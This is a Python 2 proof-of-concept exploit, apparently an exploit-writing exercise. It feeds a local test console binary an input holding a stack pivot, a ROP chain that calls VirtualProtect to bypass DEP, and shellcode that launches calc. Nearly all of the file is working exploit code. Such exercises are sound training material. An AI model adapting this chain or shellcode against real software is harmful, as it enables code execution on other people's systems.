# Python 2 proof-of-concept that writes one crafted input line-set to a local
# console binary started with os.popen4 (the target path is hard-coded below).
# The input consists of a struct-packed ROP chain followed by raw payload bytes.
# Python 2 only: `string.letters`, `os.popen4`, the `print` statement and
# `raw_input` were all removed in Python 3, so this file does not run on 3.x.
import struct
import random, string
from os import popen4


def randomword(length):
    # Return `length` characters drawn from string.letters (ASCII letters,
    # locale dependent on Python 2). Uses `random`, not `secrets` -- fine for
    # filler, not for anything that needs unpredictability.
    # NOTE(review): defined but never called anywhere in this file.
    return ''.join(random.choice(string.letters) for i in range(length))


# Raw payload bytes, appended verbatim after the ROP chain in `cadena` below.
# The chain below unprotects the region it was copied to and then jumps here.
shellcode="\x31\xdb\x64\x8b\x7b\x30\x8b\x7f\x0c\x8b\x7f\x1c\x8b\x47\x08\x8b\x77\x20\x8b\x3f\x80\x7e\x0c\x33\x75\xf2\x89\xc7\x03\x78\x3c\x8b\x57\x78\x01\xc2\x8b\x7a\x20\x01\xc7\x89\xdd\x8b\x34\xaf\x01\xc6\x45\x81\x3e\x43\x72\x65\x61\x75\xf2\x81\x7e\x08\x6f\x63\x65\x73\x75\xe9\x8b\x7a\x24\x01\xc7\x66\x8b\x2c\x6f\x8b\x7a\x1c\x01\xc7\x8b\x7c\xaf\xfc\x01\xc7\x89\xd9\xb1\xff" \
"\x66\x31\xDB\x64\x8B\x73\x08\x81\xC6\x00\x02\x00\x00\x8B\xE6"+"\x68\x63\x61\x6c\x63\x89\xe2\x52\x52\x53\x53\x53\x53\x53\x53\x52\x53\xff\xd7" + "\x6A\xFF\xFF\x15\xA4\xD2\xCD\x61"

# popen4 returns (child_stdin, child_stdout); the names match that order.
# The command is a hard-coded absolute path to the test binary.
stdin,stdout = popen4(r"C:\Users\ricnar\Desktop\GUS\ConsoleApplication2.exe")
# Blocks until Enter is pressed -- presumably a pause before the input is
# sent (e.g. to attach a debugger to the child); nothing read is used.
raw_input()
print stdin

# ROP chain, part 1: pivot and copy. Every entry is an absolute address or an
# immediate; the chain therefore assumes the referenced modules are loaded at
# fixed bases (no ASLR rebasing), which is the mitigation that breaks it.
rop1 = [
    0x6601e02c, # address for jump to pivoting in offset 000006F8 CALL DWORD PTR DS:[EDX+4] ConsoleApplication2.exe
    0x61CD3FFB, # MOV EAX,EBX # POP EBX # RET
    0x6601E030,
    0x61CD439A, # gadget to memcpy our shellcode to 0x6601E040
    0x6601E040, # destination of thne memcpy
    0x500, 0x800, # size to copy
]

# ROP chain, part 2: repeated 24 times below (24 * rop2) as padding/sled.
rop2 = [
    0x6601E0F8, # jump to executable shellcode in the final
]

# ROP chain, part 3: resolves VirtualProtect through the IAT, marks the copied
# region executable (0x40 = PAGE_EXECUTE_READWRITE) and transfers control.
# DEP alone does not stop this; ASLR on the module holding the gadgets would.
rop3 = [
    0x11, 0x22, 0x33, 0x6601E0A4,
    0x61CD4FB7, #POP EAX # POP ECX # RET
    0x660ef1a0, # VirtualProtect IAT
    0x10,
    0x61CD5705, # MOV EAX,DWORD PTR DS:[EAX] # RET VirtualProtect Address to EAX
    0x61CD32D4, # CALL EAX to call VirtualProtect
    0x6601E040, # address to unprotect give execution
    0x1, # size
    0x40, # executable
    0x6601E038, 0x41414141, 0x6601E1F0,
]

# Concatenate the three parts; rop2 is repeated 24 times.
rop_pivot2= rop1+ (24 * rop2) + rop3
# Pack every entry as a little-endian unsigned 32-bit value ("<" + "L"*N),
# so each address occupies exactly 4 bytes in the byte string.
rop = (struct.pack("<" + ("L" * len(rop_pivot2)), *rop_pivot2))

# Full input: four newline-terminated fields followed by the ROP chain, the
# payload bytes and a final newline. The decimal field 1711332255 is
# 0x6600db9f (see the author's note on the next line).
cadena = "a" * 30 +'\n' + "b" * 2 +'\n' + "420" + "\n" + "1711332255"+ "\n" + rop + shellcode + "\n"
# 1711332255 stack pivot 0x6600db9f XCHG EAX, EBP ... LEAVE # RET

# Echo the input (it contains non-printable bytes) and send it to the child.
# Nothing is read back from `stdout`, so the child's response is discarded.
print "Escribe: " + cadena
stdin.write(cadena)